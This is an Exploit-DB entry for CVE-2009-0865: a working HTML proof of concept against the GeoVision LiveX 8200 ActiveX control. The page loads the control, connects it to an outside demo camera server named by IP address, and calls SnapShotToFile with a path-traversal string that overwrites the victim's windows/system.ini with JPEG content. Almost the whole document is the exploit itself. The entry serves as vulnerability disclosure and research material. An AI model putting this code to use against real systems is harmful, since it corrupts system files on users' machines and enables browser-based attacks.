GeoVision LiveX 8200 - ActiveX LIVEX_~1.OCX File Corruption PoC

2009-02-16T00:00:00
ID EDB-ID:8059
Type exploitdb
Reporter Nine:Situations:Group
Modified 2009-02-16T00:00:00

Description

GeoVision LiveX_v8200 ActiveX (LIVEX_~1.OCX) File Corruption PoC. CVE-2009-0865. Remote exploit for windows platform

                                        
                                            <!--
GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc
by Nine:Situations:Group::SnoopyAssault
site: http://retrogod.altervista.org/

working against IE8b/xpsp3, safe for scripting and for initialize.
LiveX_v7000 with clsid {DA8484DE-52DB-4860-A986-61A8682E298A}
LiveX_v8120 with clsid {F4421170-DB22-4551-BBFB-FFCFFB419F6F}
have the same SnapShotToFile() and SnapShotX() methods

this poc connects to a live demo server and replaces system.ini with jpeg content...
could we set arbitrary content (???) ... maybe trough a fake server, checking ...
-->
<html>
<head>
<script language="JavaScript">
function sleep(n)
{
    var now = new Date();
    var exitTime = now.getTime() + (n*1000);
    while (true) {
        now = new Date();
            if (now.getTime() > exitTime) return;
    }
}
</script>
</head>
<body>
	<object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300">
            <param name="IpAddress" value="http://24.248.47.203" ref> <!-- demo server -->
            <param name="DisablePWD" value="-1">
            <param name="UserName" value="wec">
            <param name="Password" value="">
          	<param name="CommandPort" value="4550">
			<param name="DataPort" value="5550">
			<param name="AudioDataPort" value="6550">
			<param name="BandWidth" value="LAN">
			<param name="FixSize" value="0">
			<param name="FixWidth" value="320">
			<param name="FixHeight" value="240">
			<param name="SvrType" value="0">
			<param name="AutoLogin" value="0">
			<param name="DefaultCam" value="1">
			<param name="AutoReConnect" value="-1">
			<param name="MaxRetries" value="-1">
			<param name="RetryInterval" value="70">
          </object>
<script language="JavaScript">
  sleep(2);
  //WebCamX1.SetCntDeviceType(0);
  //WebCamX1.EnableAutoScreenSize(1);
  //WebCamX1.SetInfo(125,1,0,"","");
  //WebCamX1.SetInfo(129,1,0,"","");	
  //WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0);
  //WebCamX1.DefaultCam = 1;
  WebCamX1.PlayX();
  sleep(2);
  WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini");
  WebCamX1.SnapShotX();
</script>    		
</body>
</html>

# milw0rm.com [2009-02-16]